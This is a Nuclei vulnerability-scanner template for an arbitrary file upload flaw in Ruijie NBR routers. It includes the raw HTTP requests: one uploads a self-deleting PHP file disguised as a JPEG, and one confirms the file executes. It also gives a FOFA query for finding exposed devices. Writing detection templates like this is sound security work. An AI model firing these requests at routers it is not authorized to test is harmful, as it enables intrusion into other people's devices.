nuclei-templates/http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml

40 lines
1.5 KiB
YAML

id: ruijie-nbr-fileupload
info:
name: Ruijie NBR fileupload.php - Arbitrary File Upload
author: SleepingBag945
severity: critical
description: |
Ruijie NBR router fileupload.php file has an arbitrary file upload vulnerability. An attacker can upload any file to the server through the vulnerability to obtain server permissions.
reference:
- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/ruijie-nbr-fileupload.yaml
metadata:
verified: true
max-request: 2
fofa-query: app="Ruijie-NBR路由器"
tags: ruijie,file-upload,intrusive,nbr
variables:
filename: "{{rand_base(6)}}"
string: "{{rand_base(5)}}"
http:
- raw:
- |
POST /ddi/server/fileupload.php?uploadDir=upload&name={{filename}}.php HTTP/1.1
Host: {{Hostname}}
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
Content-Type: image/jpeg
<?php echo "{{string}}"; unlink(__FILE__); ?>
- |
GET /ddi/server/upload/{{filename}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && contains(body_1,"jsonrpc")
- status_code_2 == 200 && contains(body_2,"{{string}}")
condition: and
# digest: 4a0a0047304502205aec15506f551f025b3d99fd40a127b9e9c4787e16d32915d121b954cf089721022100d8fe6d2cbdf3db8ebc017eee812656570ec642c8ae99dea9b26c64c427570fee:922c64590222798bb761d5b6d8e72950